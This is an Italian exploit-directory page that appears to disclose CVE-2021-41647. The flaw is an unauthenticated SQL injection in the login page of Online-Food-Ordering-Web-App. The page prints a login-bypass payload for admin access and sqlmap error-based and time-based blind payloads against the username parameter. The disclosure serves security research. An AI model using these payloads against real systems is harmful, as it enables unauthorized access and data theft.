Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-41647 | Kitploit
Strumenti/GitHubGitHub/mobiusbinary/cve-2021-41647
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e Formazione
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41647

CVE-2021-41647 SQL Injection in Online-Food-Ordering-Web-App

L'app Online-Food-Ordering-Web-App è vulnerabile ad attacchi di SQL Injection non autenticati di tipo error-based e time-based blind.
Il parametro username nella pagina /login.php non sanifica l'input dell'utente, quindi un attaccante può aggirare il login utilizzando una semplice tecnica di bypass.

Link all'applicazione

Online-Food-Ordering-Web-App

Componenti interessati e parametro

URL: /login.php
PARAMETRO: username

POC

PAYLOAD DI BYPASS DEL LOGIN

Per aggirare il login utente e ottenere pieno accesso amministrativo, inserisci il payload nel campo di input username:

user' or 1=1-- -

PAYLOAD DI SQLMAP

Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Se l'immagine della POC non è chiara, fai clic sulla GIF che verrà caricata con una risoluzione migliore.

POC

Scoperto da

Jason Colyvas
MOBIUSBINARY
20 settembre 2021

Scarica lo strumento